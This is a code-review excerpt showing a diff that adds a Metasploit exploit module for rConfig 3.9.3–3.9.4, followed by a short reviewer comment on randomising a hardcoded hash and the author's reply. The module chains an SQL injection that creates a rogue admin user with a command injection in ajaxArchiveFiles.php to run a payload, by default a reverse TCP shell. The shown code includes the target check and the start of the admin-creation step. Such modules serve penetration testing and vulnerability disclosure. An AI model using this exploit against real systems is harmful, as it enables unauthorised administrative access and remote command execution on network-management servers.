modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb

```diff
@@ -0,0 +1,197 @@
+        This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.
+        The steps are:
+          1. SQLi on /commands.inc.php allow us to add an administrative user.
+          2. An authenticated session is established with the newly added user
+          3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to
+             execute the payload.
+          4. Remove the added admin user.
+      ',
+                      'License'         => MSF_LICENSE,
+                      'Author'          =>
+        [
+          'Jean-Pascal Thomas' # @vikingfr - Discovery, exploit and Metasploit module
+        ],
+                      'References'      =>
+        [
+          ['CVE', '2019-19509'], # authenticated rce
+          ['CVE', '2020-10220'], # sqli auth bypass
+          %w[EDB 47982],
+          %w[EDB 48208],
+          ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE
+          ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py']  # unauthenticated SQLi
+        ],
+                      'Platform'        => %w[unix linux],
+                      'Arch'            => ARCH_CMD,
+                      'Targets'         => [['Auto', {}]],
+                      'Privileged'      => true,
+                      'DisclosureDate'  => '2020-03-11',
+                      'DefaultOptions'  => {
+                        'RPORT' => 443,
+                        'SSL'     => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects
+                        'PAYLOAD' => 'generic/shell_reverse_tcp'
+                      },
+                      'DefaultTarget' => 0))
+    register_options [
+      OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/'])
+    ]
+  end
+
+  # CHECK IF RCONFIG IS REACHABLE AND INSTALLED
+  def check
+    vprint_status 'STEP 0: Get rConfig version...'
+    res = send_request_cgi!(
+      'method' => 'GET',
+      'uri' => '/login.php'
+    )
+    if !res || !res.get_html_document
+      fail_with(Failure::Unknown, 'Could not check rConfig version')
+    end
+    if res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig Version 3.9'
+      print_status('rConfig version 3.9 detected')
+      return Exploit::CheckCode::Appears
+    elsif res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig'
+      print_status('rConfig detected, but not version 3.9')
+      return Exploit::CheckCode::Detected
+    end
+  end
+
+  # CREATE AN ADMIN USER IN RCONFIG
+  def create_rconfig_user(user, _password)
+    vprint_status 'STEP 1 : Adding a temporary admin user...'
+    fake_id = Rex::Text.rand_text_numeric(3)
+    fake_pass = Rex::Text.rand_text_alpha(10)
+    fake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin'
+    fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'
```

Comment:
if it's not important it should randomize using ```rand_text_alphanumeric(32)```

Reply:
I don't know the difference (maybe code improvement) but I will think about it in my next Metasploit modules.